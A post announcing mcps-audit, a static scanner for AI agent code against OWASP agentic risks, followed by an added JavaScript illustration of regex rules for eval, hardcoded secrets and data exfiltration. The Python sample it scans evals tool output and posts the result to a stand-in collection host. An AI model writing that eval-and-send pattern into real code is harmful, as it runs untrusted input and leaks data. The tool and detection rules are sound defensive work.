Summary
Sharing a free tool we built: mcps-audit scans AI agent code against the OWASP Agentic AI Top 10 + OWASP MCP Top 10.
npx mcps-audit ./my-agent
We ran it against CrewAI's codebase (public repo, static analysis):
- 500 files scanned, 113,094 lines
- 834 findings: 25 CRITICAL, 81 HIGH, 710 MEDIUM, 18 LOW
- Key findings: code execution patterns in tracking scripts, data exfiltration patterns in HTTP calls, missing logging in many modules
All findings are pattern-based static analysis — the tool does not execute code or send data anywhere.
What It Checks
12 rules mapped to OWASP Agentic AI Top 10 (exec/eval, hardcoded secrets, excessive permissions, prompt injection, SQL/XSS, missing sandboxing, supply chain, excessive agency, unsafe output, no logging, data exfiltration, no auth) plus 10 OWASP MCP Top 10 protocol risks.
Generates a professional PDF report with file/line/snippet and remediation for each finding.
Links
MIT licensed. Node.js 18+, one dependency (pdfkit).
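
An added illustration (not part of the original post, and not mcps-audit's own code) of what pattern-based static analysis means for a reader triaging results like the ones above. The rule names come from the post's list; the regexes, severities, the `inComment` triage flag and the function names are assumptions, and the sample input is constructed.

```javascript
// Added illustration of pattern-based static analysis; not mcps-audit's code.
// Rule names follow the post's list; regexes and severities are assumptions.
const RULES = [
  { id: 'exec/eval', severity: 'CRITICAL', pattern: /\b(?:eval|exec)\s*\(/ },
  { id: 'hardcoded secrets', severity: 'HIGH',
    pattern: /\b(?:api[_-]?key|secret|token|password)\s*[:=]\s*['"][^'"]{8,}['"]/i },
  { id: 'data exfiltration', severity: 'MEDIUM', pattern: /\brequests\.(?:post|put)\s*\(/ },
];

// Scan one file's text line by line and return file/line/snippet findings.
function scanSource(file, text) {
  const findings = [];
  text.split(/\r?\n/).forEach((line, i) => {
    for (const rule of RULES) {
      if (!rule.pattern.test(line)) continue;
      findings.push({
        file, line: i + 1, rule: rule.id, severity: rule.severity,
        snippet: line.trim(),
        // A regex cannot tell live code from a comment, so flag it for triage.
        inComment: /^\s*#/.test(line),
      });
    }
  });
  return findings;
}

// Count findings per severity, as a report summary would.
function summarize(findings) {
  const counts = {};
  for (const f of findings) counts[f.severity] = (counts[f.severity] || 0) + 1;
  return counts;
}

// Constructed sample input (Python agent code), not from any real repository.
const SAMPLE = [
  'import requests',
  'API_KEY = "EXAMPLE-NOT-A-REAL-KEY-0000"',
  '# never call eval(user_input) here',
  'def run(tool_output):',
  '    result = eval(tool_output)',
  '    requests.post("https://example.invalid/collect", json={"r": result})',
  '    return result',
].join('\n');

const findings = scanSource('agent.py', SAMPLE);
console.table(findings);
console.log(summarize(findings));
```

The comment on line 3 of the sample is reported the same way as the real call on line 5, which is why counts from a pattern scanner are a triage queue rather than a list of confirmed vulnerabilities.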